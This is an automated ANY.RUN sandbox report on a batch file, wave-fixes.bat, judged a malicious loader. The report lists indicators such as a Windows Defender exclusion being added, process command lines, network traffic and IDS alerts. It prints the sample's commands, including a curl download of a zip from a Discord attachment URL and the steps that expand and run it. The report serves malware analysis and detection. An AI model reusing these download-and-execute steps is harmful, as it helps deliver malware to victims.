File name: wave-fixes.bat

Full analysis: https://app.any.run/tasks/3a0f2c03-c28d-4361-8e33-411aad971903
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 30, 2025, 02:56:59
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
discord
payload
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5: CD6874847B186973474AE32AA1F9D2F0
SHA1: C0DE8A0753737B107027FFF2E53EEB51BCA52577
SHA256: 6A09D3DC13A6D819F4196AB7C197633AEDD970DF832BACC33DE33A3DDA894457
SSDEEP: 48:NK6S+DdkMRRtbqwgtctzns6ZI5RjjfsLSdfVZIJKKSQiF6oFERC:e+DHRrpga+6+PkyZI4KXiF6ZRC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes Windows Defender settings

      • cmd.exe (PID: 7660)
      • powershell.exe (PID: 7724)
    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 7660)
      • powershell.exe (PID: 7724)
  • SUSPICIOUS

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 7660)
      • powershell.exe (PID: 7724)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 7724)
      • cmd.exe (PID: 7660)
    • Application launched itself

      • powershell.exe (PID: 7724)
      • cmd.exe (PID: 7660)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 7976)
    • Starts process via Powershell

      • powershell.exe (PID: 7724)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7976)
    • The executable file from the user directory is run by the CMD process

      • WaveInstaller.exe (PID: 4228)
      • WaveInstaller.exe (PID: 2384)
      • WaveInstaller.exe (PID: 7268)
    • Discord domain found in command line (probably downloading payload)

      • curl.exe (PID: 7308)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 7280)
    • Reads security settings of Internet Explorer

      • WaveInstaller.exe (PID: 7268)
    • Executing commands from a ".bat" file

      • cmd.exe (PID: 7660)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 7660)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 7976)
      • WaveInstaller.exe (PID: 7268)
    • Checks proxy server information

      • powershell.exe (PID: 7976)
      • WaveInstaller.exe (PID: 7268)
      • slui.exe (PID: 8100)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7924)
      • powershell.exe (PID: 7280)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7924)
      • powershell.exe (PID: 7280)
    • Reads the computer name

      • curl.exe (PID: 7308)
      • WaveInstaller.exe (PID: 7268)
      • curl.exe (PID: 7324)
    • Reads the machine GUID from the registry

      • WaveInstaller.exe (PID: 7268)
    • Checks supported languages

      • curl.exe (PID: 7324)
      • curl.exe (PID: 7308)
      • WaveInstaller.exe (PID: 7268)
    • Execution of CURL command

      • cmd.exe (PID: 7660)
    • Reads the software policy settings

      • WaveInstaller.exe (PID: 7268)
      • slui.exe (PID: 8100)
No Malware configuration.
No data.
Total processes: 140
Monitored processes: 15
Malicious processes: 2
Suspicious processes: 1


Process information

PID
CMD
Path
Indicators
Parent process
PID: 2148
CMD: cmd /c "cd VisualC++ && call install_all.bat"
Path: C:\Windows\System32\cmd.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
PID: 2384
CMD: "C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe"
Path: C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe
Parent process: cmd.exe
User:
admin
Integrity Level:
MEDIUM
Description:
WaveInstaller
Exit code:
3221226540
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\waveinstaller.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
PID: 4228
CMD: "C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe"
Path: C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe
Parent process: cmd.exe
User:
admin
Integrity Level:
MEDIUM
Description:
WaveInstaller
Exit code:
3221226540
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\waveinstaller.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
PID: 5248
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7268
CMD: "C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe"
Path: C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe
Parent process: cmd.exe
User:
admin
Integrity Level:
HIGH
Description:
WaveInstaller
Exit code:
1
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\waveinstaller.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
PID: 7280
CMD: powershell Expand-Archive -Path Visual-C-Runtimes-All-in-One-May-2024.zip -DestinationPath VisualC++
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
PID: 7308
CMD: curl -o Visual-C-Runtimes-All-in-One-May-2024.zip "https://cdn.discordapp.com/attachments/801960895658983429/1262309228140433408/Visual-C-Runtimes-All-in-One-May-2024.zip?ex=66962094&is=6694cf14&hm=2fd48ea988a8d1cf9d388adcc897b8f3ccd74481aabb52d72d52476fdc9adeec&"
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
PID: 7324
CMD: curl -o node-v20.15.0-x64.msi "https://nodejs.org/dist/v20.15.0/node-v20.15.0-x64.msi"
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
PID: 7660
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\wave-fixes.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 7668
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 28 219
Read events: 28 205
Write events: 14
Delete events: 0

Modification events

(PID) Process | Key | Operation | Name | Value
(a dash marks a cell left empty in the report)
(7268) WaveInstaller.exe | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32 | write | EnableFileTracing | 0
(7268) WaveInstaller.exe | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32 | write | EnableAutoFileTracing | 0
(7268) WaveInstaller.exe | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32 | write | EnableConsoleTracing | 0
(7268) WaveInstaller.exe | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32 | write | FileTracingMask | -
(7268) WaveInstaller.exe | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32 | write | ConsoleTracingMask | -
(7268) WaveInstaller.exe | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32 | write | MaxFileSize | 1048576
(7268) WaveInstaller.exe | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32 | write | FileDirectory | %windir%\tracing
(7268) WaveInstaller.exe | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASMANCS | write | EnableFileTracing | 0
(7268) WaveInstaller.exe | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASMANCS | write | EnableAutoFileTracing | 0
(7268) WaveInstaller.exe | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASMANCS | write | EnableConsoleTracing | 0
Executable files: 1
Suspicious files: 4
Text files: 8
Unknown types: 0

Dropped files

PID | Process | Filename | Type
7724 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_f2kfdk03.oru.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7924 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h534h2pe.bk0.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7924 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xl5nl5dr.nyd.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7976 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jdf23drl.y0g.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7724 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ntza0ugf.gte.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7924 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10cc79.TMP | binary
MD5: D040F64E9E7A2BB91ABCA5613424598E
SHA256: D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
7976 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sdzbxcal.ms2.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7280 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_35cb1utl.ut0.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7280 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fnacwggh.n03.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7724 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
MD5: A6C0C5DC8E2F4AEA9D192A0C64F10871
SHA256: 08E882CDAD663E59AFFDD456D49A07C4D662B9A2BD12E28736120B15FFFCA1C7
HTTP(S) requests: 23
TCP/UDP connections: 48
DNS requests: 19
Threats: 5

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
(a dash marks a cell left empty in the report)
- | - | GET | 200 | 4.175.87.197:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | compressed | 23.9 Kb | whitelisted
- | - | GET | 302 | 172.183.192.203:443 | https://www.nuget.org/api/v2/package/chromiumembeddedframework.runtime.win-x86/124.3.8 | unknown | html | 232 b | whitelisted
- | - | GET | 304 | 4.175.87.197:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | - | - | unknown
- | - | GET | 200 | 104.26.5.10:443 | https://cdn.getwave.gg/WaveInstaller.exe | unknown | executable | 2.27 Mb | unknown
- | - | GET | - | 2.16.183.203:443 | https://globalcdn.nuget.org/packages/chromiumembeddedframework.runtime.win-x86.124.3.8.nupkg?packageVersion=124.3.8 | unknown | - | - | unknown
7684 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | - | - | whitelisted
7684 | SIHClient.exe | GET | 200 | 2.16.164.24:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
7684 | SIHClient.exe | GET | 200 | 2.16.164.24:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | - | - | whitelisted
7684 | SIHClient.exe | GET | 200 | 2.16.164.24:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | unknown | - | - | whitelisted
7684 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | - | - | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
(a dash marks a cell left empty in the report)
- | - | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
3216 | svchost.exe | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
7976 | powershell.exe | 104.26.5.10:443 | cdn.getwave.gg | CLOUDFLARENET | US | unknown
7308 | curl.exe | 162.159.130.233:443 | cdn.discordapp.com | CLOUDFLARENET | - | whitelisted
7324 | curl.exe | 104.20.23.46:443 | nodejs.org | CLOUDFLARENET | - | shared
7684 | SIHClient.exe | 4.175.87.197:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
7268 | WaveInstaller.exe | 172.183.192.203:443 | www.nuget.org | MICROSOFT-CORP-MSN-AS-BLOCK | DE | whitelisted
7268 | WaveInstaller.exe | 2.19.126.162:443 | globalcdn.nuget.org | Akamai International B.V. | DE | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
google.com
  • 142.250.185.142
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
cdn.getwave.gg
  • 104.26.5.10
  • 172.67.73.39
  • 104.26.4.10
unknown
cdn.discordapp.com
  • 162.159.130.233
  • 162.159.133.233
  • 162.159.134.233
  • 162.159.135.233
  • 162.159.129.233
whitelisted
nodejs.org
  • 104.20.23.46
  • 104.20.22.46
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
www.nuget.org
  • 172.183.192.203
whitelisted
globalcdn.nuget.org
  • 2.19.126.162
  • 2.19.126.132
whitelisted
crl.microsoft.com
  • 2.16.164.24
  • 2.16.164.106
  • 2.16.164.9
  • 2.16.164.18
  • 2.16.164.99
whitelisted

Threats

PID | Process | Class | Message
(a dash marks a cell left empty in the report)
- | - | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
- | - | Misc activity | ET INFO Request for EXE via Powershell
- | - | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP
2196 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)
7308 | curl.exe | Misc activity | ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
No debug info